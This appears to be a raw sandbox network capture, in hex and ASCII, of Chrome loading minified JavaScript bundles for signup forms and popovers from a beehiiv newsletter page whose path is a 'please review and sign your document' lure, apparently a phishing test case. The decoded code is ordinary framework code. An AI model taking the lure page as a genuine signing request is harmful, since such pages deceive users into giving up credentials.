                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 7d 29 2c 53 65 3d 57 3f 22 70 61 72 65 6e 74 22 3a 22 6c 65 61 66 22 2c 6c 65 3d 77 21 3d 3d 6e 75 6c 6c 3f 28 77 26 6a 2e 43 6c 6f 73 69 6e 67 29 3d 3d 3d 6a 2e 43 6c 6f 73 69 6e 67 3a 21 31 2c 52 65 3d 61 65 7c 7c 6c 65 3f 21 31 3a 4e 2c 50 65 3d 73 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 76 61 72 20 63 2c 79 3b 72 65 74 75 72 6e 28 79 3d 41 72 72 61 79 2e 66 72 6f 6d 28 28 63 3d 6d 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 62 6f 64 79 20 3e 20 2a 22 29 29 21 3d 6e 75 6c 6c 3f 63 3a 5b 5d 29 2e 66 69 6e 64 28 76 3d 3e 76 2e 69 64 3d 3d 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 2d 72 6f 6f 74 22 3f 21 31 3a 76 2e 63 6f 6e 74 61 69 6e 73 28 59 2e 63 75 72 72 65 6e 74 29 26 26 76 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                            Data Ascii: }),Se=W?"parent":"leaf",le=w!==null?(w&j.Closing)===j.Closing:!1,Re=ae||le?!1:N,Pe=s.useCallback(()=>{var c,y;return(y=Array.from((c=m?.querySelectorAll("body > *"))!=null?c:[]).find(v=>v.id==="headlessui-portal-root"?!1:v.contains(Y.current)&&v instanceo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            87192.168.2.1649813104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC847OUTGET /assets/CreateAction-Dl0JjCOR.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 18549
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"4875-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b118c70fab-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 64 62 30 61 32 61 64 2d 35 61 38 64 2d 35 36 33 38 2d 39 31 39 62 2d 38 63 30 63 34 34 61 30 33 30 37 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9db0a2ad-5a8d-5638-919b-8c0c44a0307e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6d 70 6f 72 74 7b 61 20 61 73 20 66 65 2c 75 20 61 73 20 68 65 2c 4c 20 61 73 20 78 65 7d 66 72 6f 6d 22 2e 2f 50 61 67 65 50 72 6f 76 69 64 65 72 2d 75 4b 78 6f 69 4e 64 6c 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 67 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 59 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 45 65 2c 64 20 61 73 20 6b 65 2c 63 20 61 73 20 62 65 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a
                                                                                                                                            Data Ascii: mport{a as fe,u as he,L as xe}from"./PageProvider-uKxoiNdl.js";import{u as ge}from"./useToast-DK42uF07.js";import{u as Y}from"./useTranslation-CfKJAmGY.js";import{u as Ee,d as ke,c as be}from"./components-Oj2xMfGE.js";import{c as N}from"./index-x2da_zcv.j
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 63 6f 6d 6d 65 6e 64 69 6e 67 50 75 62 6c 69 63 61 74 69 6f 6e 49 64 3a 72 7d 29 3d 3e 65 2e 6a 73 78 28 76 65 2c 7b 66 61 6c 6c 62 61 63 6b 3a 65 2e 6a 73 78 28 65 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 29 3d 3e 65 2e 6a 73 78 73 28 65 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 22 72 65 66 22 2c 76 61 6c 75 65 3a 6f 7c 7c 22 22 2c 6f 6e 43 68 61 6e 67 65 3a 28 29 3d 3e 6e 75 6c 6c 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 22 62 68 62 61 22 2c 76 61 6c 75 65 3a 72 7c 7c 22 22 2c 6f 6e 43 68 61 6e 67 65 3a 28 29 3d 3e 6e 75 6c 6c 7d 29 2c 65 2e 6a 73 78 28 22
                                                                                                                                            Data Ascii: commendingPublicationId:r})=>e.jsx(ve,{fallback:e.jsx(e.Fragment,{}),children:()=>e.jsxs(e.Fragment,{children:[e.jsx("input",{hidden:!0,name:"ref",value:o||"",onChange:()=>null}),e.jsx("input",{hidden:!0,name:"bhba",value:r||"",onChange:()=>null}),e.jsx("
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 74 54 6f 26 26 50 29 7b 63 6f 6e 73 74 20 67 3d 7b 73 74 61 72 74 65 64 41 74 3a 6e 65 77 20 44 61 74 65 28 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 2c 63 75 72 72 65 6e 74 49 6e 64 65 78 3a 30 2c 6e 65 78 74 49 6e 64 65 78 3a 31 2c 72 65 64 69 72 65 63 74 73 3a 6b 7d 3b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 78 65 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 67 29 29 7d 21 79 26 26 66 3f 2e 72 65 64 69 72 65 63 74 54 6f 26 26 28 53 26 26 68 3f 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 69 66 28 6a 65 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 29 74 72 79 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 66 3f 2e 72 65 64 69 72 65 63 74 54 6f 7d 63
                                                                                                                                            Data Ascii: tTo&&P){const g={startedAt:new Date().toISOString(),currentIndex:0,nextIndex:1,redirects:k};localStorage.setItem(xe.SIGNUP_REDIRECTS,JSON.stringify(g))}!y&&f?.redirectTo&&(S&&h?setTimeout(()=>{if(je(navigator.userAgent))try{window.location=f?.redirectTo}c
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 22 72 65 64 69 72 65 63 74 5f 70 61 74 68 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 56 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 73 65 6e 74 5f 66 72 6f 6d 5f 6f 72 63 68 69 64 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 22 74 72 75 65 22 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 66 61 6c 6c 62 61 63 6b 5f 70 61 74 68 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 76 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 64 6f 75 62 6c 65 5f 6f 70 74 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 4f 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65
                                                                                                                                            Data Ascii: "redirect_path",type:"hidden",value:V}),e.jsx("input",{name:"sent_from_orchid",type:"hidden",value:"true"}),e.jsx("input",{name:"fallback_path",type:"hidden",value:v}),e.jsx("input",{name:"double_opt",type:"hidden",value:O.toString()}),e.jsx("input",{name
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 75 6d 22 2c 73 74 79 6c 65 3a 7b 63 6f 6c 6f 72 3a 6d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 28 22 73 68 61 72 65 64 2e 63 74 61 2e 67 64 70 72 5f 73 69 67 6e 75 70 5f 63 6f 6e 73 65 6e 74 22 29 2c 22 20 22 2c 6e 28 22 73 68 61 72 65 64 2e 63 74 61 2e 73 69 67 6e 5f 75 70 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 22 61 22 2c 7b 68 72 65 66 3a 22 2f 74 6f 73 22 2c 74 61 72 67 65 74 3a 22 5f 62 6c 61 6e 6b 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 20 75 6e 64 65 72 6c 69 6e 65 2d 6f 66 66 73 65 74 2d 31 20 68 6f 76 65 72 3a 6f 70 61 63 69 74 79 2d 38 30 22 2c 72 65 6c 3a 22 6e 6f 72 65 66 65 72 72 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 28 22 6d 65 74 61 2e 74 69 74 6c 65 73 2e 74 6f 73 22 29 7d 29 2c 22 2e 22 5d 7d 29 5d 7d 29 5d 7d
                                                                                                                                            Data Ascii: um",style:{color:m},children:[n("shared.cta.gdpr_signup_consent")," ",n("shared.cta.sign_up")," ",e.jsx("a",{href:"/tos",target:"_blank",className:"underline underline-offset-1 hover:opacity-80",rel:"noreferrer",children:n("meta.titles.tos")}),"."]})]})]}
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 22 2c 61 75 74 6f 46 6f 63 75 73 3a 61 2c 72 65 71 75 69 72 65 64 3a 21 30 2c 73 74 79 6c 65 3a 7b 2e 2e 2e 74 26 26 7b 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 74 7d 2c 2e 2e 2e 6f 26 26 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 6f 7d 2c 63 6f 6c 6f 72 3a 22 23 31 31 31 38 32 37 22 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 4e 28 22 77 74 2d 62 75 74 74 6f 6e 2d 66 6f 6e 74 20 7a 2d 31 30 20 77 2d 66 75 6c 6c 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 70 6c 61 63 65 68 6f 6c 64 65 72 2d 73 68 6f 77 6e 3a 74 65 78 74 2d 65 6c 6c 69 70 73 69 73 22 2c 7b 22 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 74 65 78 74 2d 6c 67 20 61 63 74 69 76 65 3a 74 65 78 74 2d 6c 67 20 73 6d 3a 74 65 78 74 2d 6c 67 22 3a 21 72 7c 7c 72 3d 3d 3d 22 6c 67
                                                                                                                                            Data Ascii: ",autoFocus:a,required:!0,style:{...t&&{borderColor:t},...o&&{fontFamily:o},color:"#111827"},className:N("wt-button-font z-10 w-full border-none bg-transparent placeholder-shown:text-ellipsis",{"text-lg focus:text-lg active:text-lg sm:text-lg":!r||r==="lg
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3a 74 65 78 74 2d 6c 67 20 61 63 74 69 76 65 3a 74 65 78 74 2d 6c 67 20 73 6d 3a 74 65 78 74 2d 6c 67 22 3a 21 61 7c 7c 61 3d 3d 3d 22 6c 67 22 7d 2c 7b 22 74 65 78 74 2d 73 6d 20 66 6f 63 75 73 3a 74 65 78 74 2d 73 6d 20 61 63 74 69 76 65 3a 74 65 78 74 2d 73 6d 22 3a 61 3d 3d 3d 22 73 6d 22 7d 2c 64 3f 70 2e 72 61 64 69 75 73 3a 71 65 28 70 2e 72 61 64 69 75 73 29 2c 6d 29 2c 64 69 73 61 62 6c 65 64 3a 74 7d 29 7d 2c 4c 65 3d 28 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 2c 69 73 53 75 62 6d 69 74 74 69 6e 67 3a 6f 2c 61 75 74 6f 46 6f 63 75 73 3a 72 2c 73 65 74 45 6d 61 69 6c 3a 73 2c 6f 6e 45 6d 61 69 6c 43 68 61 6e 67 65 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 69 2c 66 6f 6e 74 53 69 7a 65 3a 6d 2c 62 75 74 74 6f 6e
                                                                                                                                            Data Ascii: :text-lg active:text-lg sm:text-lg":!a||a==="lg"},{"text-sm focus:text-sm active:text-sm":a==="sm"},d?p.radius:qe(p.radius),m),disabled:t})},Le=({signupStyles:t,isSubmitting:o,autoFocus:r,setEmail:s,onEmailChange:a})=>{const{fontFamily:i,fontSize:m,button
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 63 65 68 6f 6c 64 65 72 42 67 43 6f 6c 6f 72 3a 70 2c 70 6c 61 63 65 68 6f 6c 64 65 72 54 65 78 74 43 6f 6c 6f 72 3a 5f 2c 62 75 74 74 6f 6e 54 65 78 74 3a 77 2c 70 6c 61 63 65 68 6f 6c 64 65 72 54 65 78 74 3a 6c 2c 62 6f 72 64 65 72 45 6e 61 62 6c 65 64 3a 76 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 45 2c 65 6d 61 69 6c 49 63 6f 6e 45 6e 61 62 6c 65 64 3a 54 7d 3d 74 2c 43 3d 4d 65 28 69 2e 72 61 64 69 75 73 29 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 73 28 6f 65 2c 7b 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 70 2c 62 6f 72 64 65 72 3a 76 3f 60 32 70 78 20 73 6f 6c 69 64 20 24 7b 45 7d 60 3a 22 6e 6f 6e 65 22 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 65
                                                                                                                                            Data Ascii: ceholderBgColor:p,placeholderTextColor:_,buttonText:w,placeholderText:l,borderEnabled:v,borderColor:E,emailIconEnabled:T}=t,C=Me(i.radius);return e.jsxs(oe,{style:{backgroundColor:p,border:v?`2px solid ${E}`:"none"},className:"overflow-hidden",children:[e
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 65 6d 70 6c 61 74 65 2d 32 22 2c 22 74 65 6d 70 6c 61 74 65 2d 33 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 29 3f 22 74 65 6d 70 6c 61 74 65 2d 31 22 3a 74 2c 56 65 3d 28 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 7d 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 57 65 28 74 3f 2e 74 65 6d 70 6c 61 74 65 29 2c 72 3d 7b 22 74 65 6d 70 6c 61 74 65 2d 31 22 3a 4c 65 2c 22 74 65 6d 70 6c 61 74 65 2d 32 22 3a 55 65 2c 22 74 65 6d 70 6c 61 74 65 2d 33 22 3a 24 65 7d 5b 6f 5d 2c 7b 69 73 53 75 62 6d 69 74 74 69 6e 67 3a 73 2c 61 75 74 6f 46 6f 63 75 73 3a 61 2c 65 6d 61 69 6c 3a 69 2c 73 65 74 45 6d 61 69 6c 3a 6d 2c 6f 6e 45 6d 61 69 6c 43 68 61 6e 67 65 3a 6e 7d 3d 46 65 28 29 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 72 2c 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 2c
                                                                                                                                            Data Ascii: emplate-2","template-3"].includes(t)?"template-1":t,Ve=({signupStyles:t})=>{const o=We(t?.template),r={"template-1":Le,"template-2":Ue,"template-3":$e}[o],{isSubmitting:s,autoFocus:a,email:i,setEmail:m,onEmailChange:n}=Fe();return e.jsx(r,{signupStyles:t,


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            88192.168.2.1649815104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC842OUTGET /assets/popover-CV1J-FFp.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 16040
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3ea8-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b1eb93c354-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 38 36 36 35 62 36 66 2d 61 64 34 64 2d 35 32 62 35 2d 39 30 36 64 2d 35 32 34 37 65 35 61 36 32 36 31 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="48665b6f-ad4d-52b5-906d-5247e5a6261e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 20 24 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 49 65 2c 4e 20 61 73 20 77 65 2c 45 20 61 73 20 45 65 2c 6e 20 61 73 20 66 65 2c 79 20 61 73 20 24 65 2c 73 20 61 73 20 44 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 72 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4f 20 61 73 20 58 2c 55 20 61 73 20 59 2c 79 20 61 73 20 55 2c 63 20 61 73 20 54 65 2c 73 20 61 73 20 64 65 2c 6f 20 61 73 20 49 2c 75 20 61 73 20 48 2c 43 20 61 73 20 71 2c 49 20 61 73 20 7a 2c 61 20 61 73 20 41 2c 54 20 61 73 20 6b 65 2c 64 20 61 73 20 4e 65 2c 6c 20 61 73 20 4d 65 7d 66 72 6f 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22
                                                                                                                                            Data Ascii: s $}from"./index-D6da9p6-.js";import{e as Ie,N as we,E as Ee,n as fe,y as $e,s as D}from"./use-root-containers-DmyWFwuo.js";import{O as X,U as Y,y as U,c as Te,s as de,o as I,u as H,C as q,I as z,a as A,T as ke,d as Ne,l as Me}from"./keyboard-CaEu2o0u.js"
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 44 65 3d 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 69 6c 6c 3a 74 7d 29 3d 3e 62 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 65 28 65 29 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 54 68 72 65 61 64 73 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 39 32 20 31 39 32 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 62 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 31 2e 35 33 37 20 38 38 2e 39 38 38 33 43 31 34 30 2e 37 31 20 38 38 2e 35 39 31 39 20 31 33 39 2e 38 37 20 38 38 2e 32 31 30 34 20 31 33 39 2e 30 31 39 20 38 37 2e 38 34 35 31 43 31 33 37 2e 35 33 37 20 36 30 2e 35 33 38 32 20 31 32 32 2e 36 31 36
                                                                                                                                            Data Ascii: De=({className:e,fill:t})=>b.jsx("svg",{className:le(e),"aria-label":"Threads",viewBox:"0 0 192 192",xmlns:"http://www.w3.org/2000/svg",fill:t,children:b.jsx("path",{d:"M141.537 88.9883C140.71 88.5919 139.87 88.2104 139.019 87.8451C137.537 60.5382 122.616
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 39 35 31 34 38 20 39 37 2e 30 36 39 35 20 30 48 39 36 2e 39 35 36 39 43 36 38 2e 38 38 31 36 20 30 2e 31 39 34 34 37 20 34 37 2e 32 39 32 31 20 39 2e 36 34 31 38 20 33 32 2e 37 38 38 33 20 32 38 2e 30 37 39 33 43 31 39 2e 38 38 31 39 20 34 34 2e 34 38 36 34 20 31 33 2e 32 32 34 34 20 36 37 2e 33 31 35 37 20 31 33 2e 30 30 30 37 20 39 35 2e 39 33 32 35 4c 31 33 20 39 36 4c 31 33 2e 30 30 30 37 20 39 36 2e 30 36 37 35 43 31 33 2e 32 32 34 34 20 31 32 34 2e 36 38 34 20 31 39 2e 38 38 31 39 20 31 34 37 2e 35 31 34 20 33 32 2e 37 38 38 33 20 31 36 33 2e 39 32 31 43 34 37 2e 32 39 32 31 20 31 38 32 2e 33 35 38 20 36 38 2e 38 38 31 36 20 31 39 31 2e 38 30 36 20 39 36 2e 39 35 36 39 20 31 39 32 48 39 37 2e 30 36 39 35 43 31 32 32 2e 30 33 20 31 39 31 2e 38 32 37
                                                                                                                                            Data Ascii: 95148 97.0695 0H96.9569C68.8816 0.19447 47.2921 9.6418 32.7883 28.0793C19.8819 44.4864 13.2244 67.3157 13.0007 95.9325L13 96L13.0007 96.0675C13.2244 124.684 19.8819 147.514 32.7883 163.921C47.2921 182.358 68.8816 191.806 96.9569 192H97.0695C122.03 191.827
